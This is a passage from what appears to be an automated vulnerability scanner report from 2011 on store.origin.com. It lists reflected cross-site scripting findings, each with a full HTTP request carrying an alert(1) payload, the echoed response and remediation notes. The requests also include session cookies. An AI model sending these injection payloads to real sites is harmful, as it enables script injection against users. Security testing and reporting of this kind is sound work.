User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:15 GMT
Server: Apache/2.2.17
Content-Type: text/html
Content-Length: 68537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- DW6 -->
<head>

<title>PHUKET
...[SNIP]...
<input type="hidden" name="checkHotel[DestinationID]" value="7566605"><script>alert(1)</script>865efa0e996ad9f5c">
...[SNIP]...
4.84. http://store.origin.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 412c5--><script>alert(1)</script>d59f8e2efa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?412c5--><script>alert(1)</script>d59f8e2efa2=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=154926219549,0)
Date: Fri, 24 Jun 2011 13:44:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app49
Content-Length: 60544


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308923040451:NODE=c2a4901:THREA
...[SNIP]...
<!--!esi:include src="/store?412c5--><script>alert(1)</script>d59f8e2efa2=1&Action=DisplayESIPage&Currency=USD&ESIHC=bf89624e&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=HomePage&script>
...[SNIP]...
4.85. http://store.origin.com/DRHM/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /DRHM/store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 26d07--><script>alert(1)</script>60365ea3b11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /DRHM/store?Action=ContinueShopping&SiteID=ea&Locale=en_US&ThemeID=718200&Env=BASE&26d07--><script>alert(1)</script>60365ea3b11=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253ASHOPPINGCART%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/DRHM/store%25253FAction%25253DContinueShopping%252526SiteID%25253Dea%252526Locale%25253Den_US%252526ThemeID%25253D718200%252526Env%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=142044730526,0)
Date: Fri, 24 Jun 2011 14:39:33 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 64955


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926373194:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?26d07--><script>alert(1)</script>60365ea3b11=1&Action=DisplayESIPage&Currency=USD&ESIHC=f0fabaf3&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=HomePage"-->
...[SNIP]...
4.86. http://store.origin.com/servlet/ControllerServlet [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /servlet/ControllerServlet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 970ec<x%20style%3dx%3aexpression(alert(1))>1e64672ebab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 970ec<x style=x:expression(alert(1))>1e64672ebab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /servlet/ControllerServlet?Action=DisplayPage&id=ProductFinderLogicPage&Locale=en_US&SiteID=ea&objectID=54552300&option=1&970ec<x%20style%3dx%3aexpression(alert(1))>1e64672ebab=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0

Response (redirected)

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: VISITOR_ID=971D4E8DFAED4367E8FABBC8C336D7CFAFA20171532B684A; expires=Sat, 23-Jun-2012 20:31:09 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=116275073079,0)
Date: Fri, 24 Jun 2011 14:41:57 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 396


<!-- REQUEST ID: TIME=1308926517144:NODE=c2a4201:THREAD=47 -->
<!--!esi:include src="/store?970ec<x style=x:expression(alert(1))>1e64672ebab=1&Action=DisplayESIPage&Currency=USD&ESIHC=944044ed&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=173741100&cename=ProductFinder&id=ProductFinderLogicPage&objectID=54552300&option=1"-->
...[SNIP]...
4.87. http://store.origin.com/servlet/ControllerServlet [objectID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /servlet/ControllerServlet

Issue detail

The value of the objectID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7896e%3balert(1)//e97f0c45884 was submitted in the objectID parameter. This input was echoed as 7896e;alert(1)//e97f0c45884 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servlet/ControllerServlet?Action=DisplayPage&id=ProductFinderJSPage&Locale=en_US&SiteID=ea&objectID=545523007896e%3balert(1)//e97f0c45884 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0

Response (redirected)

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=99095095834,0)
Date: Fri, 24 Jun 2011 14:40:10 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 6948


<!-- REQUEST ID: TIME=1308926410564:NODE=c2a4201:THREAD=36 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=f0fabaf3&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=173
...[SNIP]...

//document.getElementById("dr_load").style.display = "none";
loadMessage("off");
changeSelectState(false);
}
}
dataRequest(545523007896e;alert(1)//e97f0c45884,1);


<!--!/esi:include -->
...[SNIP]...
4.88. http://store.origin.com/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b9d22<x%20style%3dx%3aexpression(alert(1))>5630e67cca4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9d22<x style=x:expression(alert(1))>5630e67cca4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /store?Action=DisplayPage&id=ProductFinderLogicPage&Locale=en_US&SiteID=ea&objectID=54552300&option=1&b9d22<x%20style%3dx%3aexpression(alert(1))>5630e67cca4=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=197879135792,0)
Date: Fri, 24 Jun 2011 14:36:47 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 398


<!-- REQUEST ID: TIME=1308926207827:NODE=c2a5301:THREAD=3806 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=d9487485&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&b9d22<x style=x:expression(alert(1))>5630e67cca4=1&ceid=172065900&cename=ProductFinder&id=ProductFinderLogicPage&objectID=54552300&option=1"-->
...[SNIP]...
4.89. http://store.origin.com/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7353c--><script>alert(1)</script>772938624bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage&7353c--><script>alert(1)</script>772938624bb=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253APRODUCTFINDERPAGE%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/en_US/AddItemToRequisition/ThemeID.718200%252526productID%25253D226783800%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=107684976519,0)
Date: Fri, 24 Jun 2011 14:39:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 26212


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926357939:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?7353c--><script>alert(1)</script>772938624bb=1&Action=DisplayESIPage&Currency=USD&ESIHC=f0fabaf3&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=ThreePgCheckoutShopping
...[SNIP]...
4.90. http://store.origin.com/store [objectID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The value of the objectID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 30c70%3balert(1)//bd42b8ad6f6 was submitted in the objectID parameter. This input was echoed as 30c70;alert(1)//bd42b8ad6f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /store?Action=DisplayPage&id=ProductFinderJSPage&Locale=en_US&SiteID=ea&objectID=5455230030c70%3balert(1)//bd42b8ad6f6 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21785430387,0)
Date: Fri, 24 Jun 2011 14:36:02 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 6952


<!-- REQUEST ID: TIME=1308926162482:NODE=c2a5301:THREAD=1735 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=1
...[SNIP]...

//document.getElementById("dr_load").style.display = "none";
loadMessage("off");
changeSelectState(false);
}
}
dataRequest(5455230030c70;alert(1)//bd42b8ad6f6,1);


<!--!/esi:include -->
...[SNIP]...
4.91. http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a9c7d--><script>alert(1)</script>84252b80866 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--><script>alert(1)</script>84252b80866=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.11.49:260-0#0"; JSESSIONID=7FD36F5B7EF2D6619ACFC964D7FBFAC2; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=822805002.260.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64731921166,0)
Date: Fri, 24 Jun 2011 13:44:14 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app49
Content-Length: 38619


<!-- REQUEST ID: TIME=1308923054923:NODE=c2a4901:THREAD=36 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=bf89624e&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&a9c7d--><script>alert(1)</script>84252b80866=1&ceid=173715400&cename=HomeTier3&id=HomeTier3Page&script>
...[SNIP]...
4.92. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 52629--><script>alert(1)</script>32e863371e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800?52629--><script>alert(1)</script>32e863371e0=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=172109476423,0)
Date: Fri, 24 Jun 2011 14:39:08 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 40166


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926348703:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?52629--><script>alert(1)</script>32e863371e0=1&Action=DisplayESIPage&Currency=USD&ESIHC=24e5cc79&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1476100&StyleVersion=12&ThemeID=718200&ceid=173716600&cename=TopHeader&id=ProductFinderPage&productID=219720
...[SNIP]...
4.93. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload be90c--><script>alert(1)</script>39260cc850a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800?be90c--><script>alert(1)</script>39260cc850a=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--%3E%3Cscript%3Ealert(1)%3C/script%3E84252b80866=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=129159595100,0)
Date: Fri, 24 Jun 2011 14:35:45 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 40083


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926145188:NODE=c2a5301:THREA
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1476100&StyleVersion=12&ThemeID=718200&be90c--><script>alert(1)</script>39260cc850a=1&ceid=173716600&cename=TopHeader&id=ProductFinderPage&productID=226783800&script>
...[SNIP]...
4.94. http://store.origin.com/store/ea/en_US/pd/ThemeID.718200/productID.201797000 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/pd/ThemeID.718200/productID.201797000

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cba28--><script>alert(1)</script>988e2a37d0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/pd/ThemeID.718200/productID.201797000?cba28--><script>alert(1)</script>988e2a37d0c=1 HTTP/1.1
Host: store.origin.com
